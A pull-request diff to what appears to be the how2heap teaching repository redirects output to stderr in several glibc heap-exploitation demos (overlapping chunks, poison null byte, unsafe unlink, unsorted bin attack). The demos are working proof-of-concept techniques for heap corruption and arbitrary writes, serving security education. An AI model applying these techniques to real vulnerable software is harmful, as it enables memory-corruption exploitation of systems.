+			fprintf(stderr, "==> ok\n");
 		} else if (strcmp(cmd, "show") == 0) {
 			if (num == 2) {
 				arg2 = 1;
 			}
 			long * src = (long*) arg1;
 			for (int i = 0; i < arg2; i++) {
-				printf("%p: %#16.0lx\n", &src[i], src[i]);
+				fprintf(stderr, "%p: %#16.0lx\n", &src[i], src[i]);
 			}
 #ifdef __GLIBC__
 		} else if (strcmp(cmd, "usable") == 0) {
-			printf("usable size: %zu\n", malloc_usable_size((void*) arg1));
+			fprintf(stderr, "usable size: %zu\n", malloc_usable_size((void*) arg1));
 		} else if (strcmp(cmd, "stats") == 0) {
 			malloc_stats();
 		} else if (strcmp(cmd, "info") == 0) {
 			malloc_info(0, stdout);
 		} else if (strcmp(cmd, "mcheck") == 0) {
-			printf("==> %s\n", mcheck(report_mcheck_fail) == 0 ? "OK" : "ERROR");
+			fprintf(stderr, "==> %s\n", mcheck(report_mcheck_fail) == 0 ? "OK" : "ERROR");
 		} else if (strcmp(cmd, "mcheck_pedantic") == 0) {
-			printf("==> %s\n", mcheck_pedantic(report_mcheck_fail) == 0 ? "OK" : "ERROR");
+			fprintf(stderr, "==> %s\n", mcheck_pedantic(report_mcheck_fail) == 0 ? "OK" : "ERROR");
 		} else if (strcmp(cmd, "mprobe") == 0) {
 			if (num > 1) {
 				print_mcheck_status(mprobe((void*) arg1));
 			} else {
 				mcheck_check_all();
-				printf("==> check_all ok\n");
+				fprintf(stderr, "==> check_all ok\n");
 			}
 #endif
 		} else {

--- a/overlapping_chunks.c
+++ b/overlapping_chunks.c
@@ -16,62 +16,62 @@ int main(int argc , char* argv[]){
 
 	intptr_t *p1,*p2,*p3,*p4;
 
-	printf("\nThis is a simple chunks overlapping problem\n\n");
-	printf("Let's start to allocate 3 chunks on the heap\n");
+	fprintf(stderr, "\nThis is a simple chunks overlapping problem\n\n");
+	fprintf(stderr, "Let's start to allocate 3 chunks on the heap\n");
 
 	p1 = malloc(0x100 - 8);
 	p2 = malloc(0x100 - 8);
 	p3 = malloc(0x80 - 8);
 
-	printf("The 3 chunks have been allocated here:\np1=%p\np2=%p\np3=%p\n", p1, p2, p3);
+	fprintf(stderr, "The 3 chunks have been allocated here:\np1=%p\np2=%p\np3=%p\n", p1, p2, p3);
 
 	memset(p1, '1', 0x100 - 8);
 	memset(p2, '2', 0x100 - 8);
 	memset(p3, '3', 0x80 - 8);
 
-	printf("\nNow let's free the chunk p2\n");
+	fprintf(stderr, "\nNow let's free the chunk p2\n");
 	free(p2);
-	printf("The chunk p2 is now in the unsorted bin ready to serve possible\nnew malloc() of its size\n");
+	fprintf(stderr, "The chunk p2 is now in the unsorted bin ready to serve possible\nnew malloc() of its size\n");
 
-	printf("Now let's simulate an overflow that can overwrite the size of the\nchunk freed p2.\n");
-	printf("For a toy program, the value of the last 3 bits is unimportant;"
+	fprintf(stderr, "Now let's simulate an overflow that can overwrite the size of the\nchunk freed p2.\n");
+	fprintf(stderr, "For a toy program, the value of the last 3 bits is unimportant;"
 		" however, it is best to maintain the stability of the heap.\n");
-	printf("To achieve this stability we will mark the least signifigant bit as 1 (prev_inuse),"
+	fprintf(stderr, "To achieve this stability we will mark the least signifigant bit as 1 (prev_inuse),"
 		" to assure that p1 is not mistaken for a free chunk.\n");
 
 	int evil_chunk_size = 0x181;
 	int evil_region_size = 0x180 - 8;
-	printf("We are going to set the size of chunk p2 to to %d, which gives us\na region size of %d\n",
+	fprintf(stderr, "We are going to set the size of chunk p2 to to %d, which gives us\na region size of %d\n",
 		 evil_chunk_size, evil_region_size);
 
 	*(p2-1) = evil_chunk_size; // we are overwriting the "size" field of chunk p2
 
-	printf("\nNow let's allocate another chunk with a size equal to the data\n"
+	fprintf(stderr, "\nNow let's allocate another chunk with a size equal to the data\n"
 	       "size of the chunk p2 injected size\n");
-	printf("This malloc will be served from the previously freed chunk that\n"
+	fprintf(stderr, "This malloc will be served from the previously freed chunk that\n"
 	       "is parked in the unsorted bin which size has been modified by us\n");
 	p4 = malloc(evil_region_size);
 
-	printf("\np4 has been allocated at %p and ends at %p\n", p4, p4+evil_region_size);
-	printf("p3 starts at %p and ends at %p\n", p3, p3+80);
-	printf("p4 should overlap with p3, in this case p4 includes all p3.\n");
+	fprintf(stderr, "\np4 has been allocated at %p and ends at %p\n", p4, p4+evil_region_size);
+	fprintf(stderr, "p3 starts at %p and ends at %p\n", p3, p3+80);
+	fprintf(stderr, "p4 should overlap with p3, in this case p4 includes all p3.\n");
 
-	printf("\nNow everything copied inside chunk p4 can overwrites data on\nchunk p3,"
+	fprintf(stderr, "\nNow everything copied inside chunk p4 can overwrites data on\nchunk p3,"
 		" and data written to chunk p3 can overwrite data\nstored in the p4 chunk.\n\n");
 
-	printf("Let's run through an example. Right now, we have:\n");
-	printf("p4 = %s\n", (char *)p4);
-	printf("p3 = %s\n", (char *)p3);
+	fprintf(stderr, "Let's run through an example. Right now, we have:\n");
+	fprintf(stderr, "p4 = %s\n", (char *)p4);
+	fprintf(stderr, "p3 = %s\n", (char *)p3);
 
-	printf("\nIf we memset(p4, '4', %d), we have:\n", evil_region_size);
+	fprintf(stderr, "\nIf we memset(p4, '4', %d), we have:\n", evil_region_size);
 	memset(p4, '4', evil_region_size);
-	printf("p4 = %s\n", (char *)p4);
-	printf("p3 = %s\n", (char *)p3);
+	fprintf(stderr, "p4 = %s\n", (char *)p4);
+	fprintf(stderr, "p3 = %s\n", (char *)p3);
 
-	printf("\nAnd if we then memset(p3, '3', 80), we have:\n");
+	fprintf(stderr, "\nAnd if we then memset(p3, '3', 80), we have:\n");
 	memset(p3, '3', 80);
-	printf("p4 = %s\n", (char *)p4);
-	printf("p3 = %s\n", (char *)p3);
+	fprintf(stderr, "p4 = %s\n", (char *)p4);
+	fprintf(stderr, "p3 = %s\n", (char *)p3);
 }
 
 

--- a/overlapping_chunks_2.c
+++ b/overlapping_chunks_2.c
@@ -20,9 +20,9 @@ int main(){
   unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6;
   int prev_in_use = 0x1;
 
-  printf("\nThis is a simple chunks overlapping problem");
-  printf("\nThis is also referenced as Nonadjacent Free Chunk Consolidation Attack\n");
-  printf("\nLet's start to allocate 5 chunks on the heap:");
+  fprintf(stderr, "\nThis is a simple chunks overlapping problem");
+  fprintf(stderr, "\nThis is also referenced as Nonadjacent Free Chunk Consolidation Attack\n");
+  fprintf(stderr, "\nLet's start to allocate 5 chunks on the heap:");
 
   p1 = malloc(1000);
   p2 = malloc(1000);
@@ -36,11 +36,11 @@ int main(){
   real_size_p4 = malloc_usable_size(p4);
   real_size_p5 = malloc_usable_size(p5);
 
-  printf("\n\nchunk p1 from %p to %p", p1, (unsigned char *)p1+malloc_usable_size(p1));
-  printf("\nchunk p2 from %p to %p", p2,  (unsigned char *)p2+malloc_usable_size(p2));
-  printf("\nchunk p3 from %p to %p", p3,  (unsigned char *)p3+malloc_usable_size(p3));
-  printf("\nchunk p4 from %p to %p", p4, (unsigned char *)p4+malloc_usable_size(p4));
-  printf("\nchunk p5 from %p to %p\n", p5,  (unsigned char *)p5+malloc_usable_size(p5));
+  fprintf(stderr, "\n\nchunk p1 from %p to %p", p1, (unsigned char *)p1+malloc_usable_size(p1));
+  fprintf(stderr, "\nchunk p2 from %p to %p", p2,  (unsigned char *)p2+malloc_usable_size(p2));
+  fprintf(stderr, "\nchunk p3 from %p to %p", p3,  (unsigned char *)p3+malloc_usable_size(p3));
+  fprintf(stderr, "\nchunk p4 from %p to %p", p4, (unsigned char *)p4+malloc_usable_size(p4));
+  fprintf(stderr, "\nchunk p5 from %p to %p\n", p5,  (unsigned char *)p5+malloc_usable_size(p5));
 
   memset(p1,'A',real_size_p1);
   memset(p2,'B',real_size_p2);
@@ -48,35 +48,35 @@ int main(){
   memset(p4,'D',real_size_p4);
   memset(p5,'E',real_size_p5);
   
-  printf("\nLet's free the chunk p4.\nIn this case this isn't coealesced with top chunk since we have p5 bordering top chunk after p4\n"); 
+  fprintf(stderr, "\nLet's free the chunk p4.\nIn this case this isn't coealesced with top chunk since we have p5 bordering top chunk after p4\n"); 
   
   free(p4);
 
-  printf("\nLet's trigger the vulnerability on chunk p1 that overwrites the size of the in use chunk p2\nwith the size of chunk_p2 + size of chunk_p3\n");
+  fprintf(stderr, "\nLet's trigger the vulnerability on chunk p1 that overwrites the size of the in use chunk p2\nwith the size of chunk_p2 + size of chunk_p3\n");
 
   *(unsigned int *)((unsigned char *)p1 + real_size_p1 ) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; //<--- BUG HERE 
 
-  printf("\nNow during the free() operation on p2, the allocator is fooled to think that \nthe nextchunk is p4 ( since p2 + size_p2 now point to p4 ) \n");
-  printf("\nThis operation will basically create a big free chunk that wrongly includes p3\n");
+  fprintf(stderr, "\nNow during the free() operation on p2, the allocator is fooled to think that \nthe nextchunk is p4 ( since p2 + size_p2 now point to p4 ) \n");
+  fprintf(stderr, "\nThis operation will basically create a big free chunk that wrongly includes p3\n");
   free(p2);
   
-  printf("\nNow let's allocate a new chunk with a size that can be satisfied by the previously freed chunk\n");
+  fprintf(stderr, "\nNow let's allocate a new chunk with a size that can be satisfied by the previously freed chunk\n");
 
   p6 = malloc(2000);
   real_size_p6 = malloc_usable_size(p6);
 
-  printf("\nOur malloc() has been satisfied by our crafted big free chunk, now p6 and p3 are overlapping and \nwe can overwrite data in p3 by writing on chunk p6\n");
-  printf("\nchunk p6 from %p to %p", p6,  (unsigned char *)p6+real_size_p6);
-  printf("\nchunk p3 from %p to %p\n", p3, (unsigned char *) p3+real_size_p3); 
+  fprintf(stderr, "\nOur malloc() has been satisfied by our crafted big free chunk, now p6 and p3 are overlapping and \nwe can overwrite data in p3 by writing on chunk p6\n");
+  fprintf(stderr, "\nchunk p6 from %p to %p", p6,  (unsigned char *)p6+real_size_p6);
+  fprintf(stderr, "\nchunk p3 from %p to %p\n", p3, (unsigned char *) p3+real_size_p3); 
 
-  printf("\nData inside chunk p3: \n\n");
-  printf("%s\n",(char *)p3); 
+  fprintf(stderr, "\nData inside chunk p3: \n\n");
+  fprintf(stderr, "%s\n",(char *)p3); 
 
-  printf("\nLet's write something inside p6\n");
+  fprintf(stderr, "\nLet's write something inside p6\n");
   memset(p6,'F',1500);  
   
-  printf("\nData inside chunk p3: \n\n");
-  printf("%s\n",(char *)p3); 
+  fprintf(stderr, "\nData inside chunk p3: \n\n");
+  fprintf(stderr, "%s\n",(char *)p3); 
 
 
 }

--- a/poison_null_byte.c
+++ b/poison_null_byte.c
@@ -7,9 +7,9 @@
 
 int main()
 {
-	printf("Welcome to poison null byte 2.0!\n");
-	printf("Tested in Ubuntu 14.04 64bit.\n");
-	printf("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");
+	fprintf(stderr, "Welcome to poison null byte 2.0!\n");
+	fprintf(stderr, "Tested in Ubuntu 14.04 64bit.\n");
+	fprintf(stderr, "This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");
 
 	uint8_t* a;
 	uint8_t* b;
@@ -18,11 +18,11 @@ int main()
 	uint8_t* b2;
 	uint8_t* d;
 
-	printf("We allocate 0x100 bytes for 'a'.\n");
+	fprintf(stderr, "We allocate 0x100 bytes for 'a'.\n");
 	a = (uint8_t*) malloc(0x100);
-	printf("a: %p\n", a);
+	fprintf(stderr, "a: %p\n", a);
 	int real_a_size = malloc_usable_size(a);
-	printf("Since we want to overflow 'a', we need to know the 'real' size of 'a' "
+	fprintf(stderr, "Since we want to overflow 'a', we need to know the 'real' size of 'a' "
 		"(it may be more than 0x100 because of rounding): %#x\n", real_a_size);
 
 	/* chunk size attribute cannot have a least significant byte with a value of 0x00.
@@ -30,10 +30,10 @@ int main()
 	 * the amount requested plus some amount required for the metadata. */
 	b = (uint8_t*) malloc(0x200);
 
-	printf("b: %p\n", b);
+	fprintf(stderr, "b: %p\n", b);
 
 	c = (uint8_t*) malloc(0x100);
-	printf("c: %p\n", c);
+	fprintf(stderr, "c: %p\n", c);
 
 	uint64_t* b_size_ptr = (uint64_t*)(b - 8);
 
@@ -41,7 +41,7 @@ int main()
 	// https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=17f487b7afa7cd6c316040f3e6c86dc96b2eec30
 	// this added check requires we are allowed to have null pointers in b (not just a c string)
 	//*(size_t*)(b+0x1f0) = 0x200;
-	printf("In newer versions of glibc we will need to have our updated size inside b itself to pass "
+	fprintf(stderr, "In newer versions of glibc we will need to have our updated size inside b itself to pass "
 		"the check 'chunksize(P) != prev_size (next_chunk(P))'\n");
 	// we set this location to 0x200 since 0x200 == (0x211 & 0xff00)
 	// which is the value of b.size after its first byte has been overwritten with a NULL byte
@@ -50,14 +50,14 @@ int main()
 	// this technique works by overwriting the size metadata of a free chunk
 	free(b);
 	
-	printf("b.size: %#lx\n", *b_size_ptr);
-	printf("b.size is: (0x200 + 0x10) | prev_in_use\n");
-	printf("We overflow 'a' with a single null byte into the metadata of 'b'\n");
+	fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
+	fprintf(stderr, "b.size is: (0x200 + 0x10) | prev_in_use\n");
+	fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
 	a[real_a_size] = 0; // <--- THIS IS THE "EXPLOITED BUG"
-	printf("b.size: %#lx\n", *b_size_ptr);
+	fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
 
 	uint64_t* c_prev_size_ptr = ((uint64_t*)c)-2;
-	printf("c.prev_size is %#lx\n",*c_prev_size_ptr);
+	fprintf(stderr, "c.prev_size is %#lx\n",*c_prev_size_ptr);
 
 	// This malloc will result in a call to unlink on the chunk where b was.
 	// The added check (commit id: 17f487b), if not properly handled as we did before,
@@ -66,38 +66,38 @@ int main()
 	// P == b-0x10, chunksize(P) == *(b-0x10+0x8) == 0x200 (was 0x210 before the overflow)
 	// next_chunk(P) == b-0x10+0x200 == b+0x1f0
 	// prev_size (next_chunk(P)) == *(b+0x1f0) == 0x200
-	printf("We will pass the check since chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n",
+	fprintf(stderr, "We will pass the check since chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n",
 		*((size_t*)(b-0x8)), *(size_t*)(b-0x10 + *((size_t*)(b-0x8))));
 	b1 = malloc(0x100);
 
-	printf("b1: %p\n",b1);
-	printf("Now we malloc 'b1'. It will be placed where 'b' was. "
+	fprintf(stderr, "b1: %p\n",b1);
+	fprintf(stderr, "Now we malloc 'b1'. It will be placed where 'b' was. "
 		"At this point c.prev_size should have been updated, but it was not: %lx\n",*c_prev_size_ptr);
-	printf("Interestingly, the updated value of c.prev_size has been written 0x10 bytes "
+	fprintf(stderr, "Interestingly, the updated value of c.prev_size has been written 0x10 bytes "
 		"before c.prev_size: %lx\n",*(((uint64_t*)c)-4));
-	printf("We malloc 'b2', our 'victim' chunk.\n");
+	fprintf(stderr, "We malloc 'b2', our 'victim' chunk.\n");
 	// Typically b2 (the victim) will be a structure with valuable pointers that we want to control
 
 	b2 = malloc(0x80);
-	printf("b2: %p\n",b2);
+	fprintf(stderr, "b2: %p\n",b2);
 
 	memset(b2,'B',0x80);
-	printf("Current b2 content:\n%s\n",b2);
+	fprintf(stderr, "Current b2 content:\n%s\n",b2);
 
-	printf("Now we free 'b1' and 'c': this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n");
+	fprintf(stderr, "Now we free 'b1' and 'c': this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n");
 
 	free(b1);
 	free(c);
 	
-	printf("Finally, we allocate 'd', overlapping 'b2'.\n");
+	fprintf(stderr, "Finally, we allocate 'd', overlapping 'b2'.\n");
 	d = malloc(0x300);
-	printf("d: %p\n",d);
+	fprintf(stderr, "d: %p\n",d);
 	
-	printf("Now 'd' and 'b2' overlap.\n");
+	fprintf(stderr, "Now 'd' and 'b2' overlap.\n");
 	memset(d,'D',0x300);
 
-	printf("New b2 content:\n%s\n",b2);
+	fprintf(stderr, "New b2 content:\n%s\n",b2);
 
-	printf("Thanks to http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf "
+	fprintf(stderr, "Thanks to http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf "
 		"for the clear explanation of this technique.\n");
 }

--- a/unsafe_unlink.c
+++ b/unsafe_unlink.c
@@ -8,64 +8,64 @@ uint64_t *chunk0_ptr;
 
 int main()
 {
-	printf("Welcome to unsafe unlink 2.0!\n");
-	printf("Tested in Ubuntu 14.04/16.04 64bit.\n");
-	printf("This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n");
-	printf("The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\n");
+	fprintf(stderr, "Welcome to unsafe unlink 2.0!\n");
+	fprintf(stderr, "Tested in Ubuntu 14.04/16.04 64bit.\n");
+	fprintf(stderr, "This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n");
+	fprintf(stderr, "The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\n");
 
 	int malloc_size = 0x80; //we want to be big enough not to use fastbins
 	int header_size = 2;
 
-	printf("The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n");
+	fprintf(stderr, "The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n");
 
 	chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
 	uint64_t *chunk1_ptr  = (uint64_t*) malloc(malloc_size); //chunk1
-	printf("The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
-	printf("The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);
+	fprintf(stderr, "The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
+	fprintf(stderr, "The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);
 
-	printf("We create a fake chunk inside chunk0.\n");
-	printf("We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.\n");
+	fprintf(stderr, "We create a fake chunk inside chunk0.\n");
+	fprintf(stderr, "We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.\n");
 	chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
-	printf("We setup the 'previous_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.\n");
-	printf("With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) == False\n");
+	fprintf(stderr, "We setup the 'previous_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.\n");
+	fprintf(stderr, "With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) == False\n");
 	chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
-	printf("Fake chunk fd: %p\n",(void*) chunk0_ptr[2]);
-	printf("Fake chunk bk: %p\n\n",(void*) chunk0_ptr[3]);
+	fprintf(stderr, "Fake chunk fd: %p\n",(void*) chunk0_ptr[2]);
+	fprintf(stderr, "Fake chunk bk: %p\n\n",(void*) chunk0_ptr[3]);
 
-	printf("We need to make sure the 'size' of our fake chunk matches the 'previous_size' of the next chunk (chunk+size)\n");
-	printf("With this setup we can pass this check: (chunksize(P) != prev_size (next_chunk(P)) == False\n");
-	printf("P = chunk0_ptr, next_chunk(P) == (mchunkptr) (((char *) (p)) + chunksize (p)) == chunk0_ptr + (chunk0_ptr[1]&(~ 0x7))\n");
-	printf("If x = chunk0_ptr[1] & (~ 0x7), that is x = *(chunk0_ptr + x).\n");
-	printf("We just need to set the *(chunk0_ptr + x) = x, so we can pass the check\n");
-	printf("1.Now the x = chunk0_ptr[1]&(~0x7) = 0, we should set the *(chunk0_ptr + 0) = 0, in other words we should do nothing\n");
-	printf("2.Further more we set chunk0_ptr = 0x8 in 64-bits environment, then *(chunk0_ptr + 0x8) == chunk0_ptr[1], it's fine to pass\n");
-	printf("3.Finally we can also set chunk0_ptr[1] = x in 64-bits env, and set *(chunk0_ptr+x)=x,for example chunk_ptr0[1] = 0x20, chunk_ptr0[4] = 0x20\n");
+	fprintf(stderr, "We need to make sure the 'size' of our fake chunk matches the 'previous_size' of the next chunk (chunk+size)\n");
+	fprintf(stderr, "With this setup we can pass this check: (chunksize(P) != prev_size (next_chunk(P)) == False\n");
+	fprintf(stderr, "P = chunk0_ptr, next_chunk(P) == (mchunkptr) (((char *) (p)) + chunksize (p)) == chunk0_ptr + (chunk0_ptr[1]&(~ 0x7))\n");
+	fprintf(stderr, "If x = chunk0_ptr[1] & (~ 0x7), that is x = *(chunk0_ptr + x).\n");
+	fprintf(stderr, "We just need to set the *(chunk0_ptr + x) = x, so we can pass the check\n");
+	fprintf(stderr, "1.Now the x = chunk0_ptr[1]&(~0x7) = 0, we should set the *(chunk0_ptr + 0) = 0, in other words we should do nothing\n");
+	fprintf(stderr, "2.Further more we set chunk0_ptr = 0x8 in 64-bits environment, then *(chunk0_ptr + 0x8) == chunk0_ptr[1], it's fine to pass\n");
+	fprintf(stderr, "3.Finally we can also set chunk0_ptr[1] = x in 64-bits env, and set *(chunk0_ptr+x)=x,for example chunk_ptr0[1] = 0x20, chunk_ptr0[4] = 0x20\n");
 	chunk0_ptr[1] = sizeof(size_t);
-	printf("In this case we set the 'size' of our fake chunk so that chunk0_ptr + size (%p) == chunk0_ptr->size (%p)\n", ((char *)chunk0_ptr + chunk0_ptr[1]), &chunk0_ptr[1]);
-	printf("You can find the commitdiff of this check at https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=17f487b7afa7cd6c316040f3e6c86dc96b2eec30\n\n");
+	fprintf(stderr, "In this case we set the 'size' of our fake chunk so that chunk0_ptr + size (%p) == chunk0_ptr->size (%p)\n", ((char *)chunk0_ptr + chunk0_ptr[1]), &chunk0_ptr[1]);
+	fprintf(stderr, "You can find the commitdiff of this check at https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=17f487b7afa7cd6c316040f3e6c86dc96b2eec30\n\n");
 
-	printf("We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n");
+	fprintf(stderr, "We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n");
 	uint64_t *chunk1_hdr = chunk1_ptr - header_size;
-	printf("We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n");
-	printf("It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\n");
+	fprintf(stderr, "We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n");
+	fprintf(stderr, "It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\n");
 	chunk1_hdr[0] = malloc_size;
-	printf("If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x90, however this is its new value: %p\n",(void*)chunk1_hdr[0]);
-	printf("We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.\n\n");
+	fprintf(stderr, "If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x90, however this is its new value: %p\n",(void*)chunk1_hdr[0]);
+	fprintf(stderr, "We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.\n\n");
 	chunk1_hdr[1] &= ~1;
 
-	printf("Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\n");
-	printf("You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n\n");
+	fprintf(stderr, "Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\n");
+	fprintf(stderr, "You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n\n");
 	free(chunk1_ptr);
 
-	printf("At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n");
+	fprintf(stderr, "At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n");
 	char victim_string[8];
 	strcpy(victim_string,"Hello!~");
 	chunk0_ptr[3] = (uint64_t) victim_string;
 
-	printf("chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\n");
-	printf("Original value: %s\n",victim_string);
+	fprintf(stderr, "chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\n");
+	fprintf(stderr, "Original value: %s\n",victim_string);
 	chunk0_ptr[0] = 0x4141414142424242LL;
-	printf("New Value: %s\n",victim_string);
+	fprintf(stderr, "New Value: %s\n",victim_string);
 }
 
 

--- a/unsorted_bin_attack.c
+++ b/unsorted_bin_attack.c
@@ -2,34 +2,34 @@
 #include <stdlib.h>
 
 int main(){
-	printf("This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
-	printf("In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
+	fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
+	fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
 		   "global variable global_max_fast in libc for further fastbin attack\n\n");
 
 	unsigned long stack_var=0;
-	printf("Let's first look at the target we want to rewrite on stack:\n");
-	printf("%p: %ld\n\n", &stack_var, stack_var);
+	fprintf(stderr, "Let's first look at the target we want to rewrite on stack:\n");
+	fprintf(stderr, "%p: %ld\n\n", &stack_var, stack_var);
 
 	unsigned long *p=malloc(400);
-	printf("Now, we allocate first normal chunk on the heap at: %p\n",p);
-	printf("And allocate another normal chunk in order to avoid consolidating the top chunk with"
+	fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",p);
+	fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with"
            "the first one during the free()\n\n");
 	malloc(500);
 
 	free(p);
-	printf("We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
+	fprintf(stderr, "We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
 		   "point to %p\n",(void*)p[1]);
 
 	//------------VULNERABILITY-----------
 
 	p[1]=(unsigned long)(&stack_var-2);
-	printf("Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
-	printf("And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);
+	fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
+	fprintf(stderr, "And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);
 
 	//------------------------------------
 
 	malloc(400);
-	printf("Let's malloc again to get the chunk we just free. During this time, target should has already been "
+	fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, target should has already been "
 		   "rewrite:\n");
-	printf("%p: %p\n", &stack_var, (void*)stack_var);
+	fprintf(stderr, "%p: %p\n", &stack_var, (void*)stack_var);
 }


### PR DESCRIPTION
This pull request prevents [this potential issue](https://github.com/shellphish/how2heap/issues/60).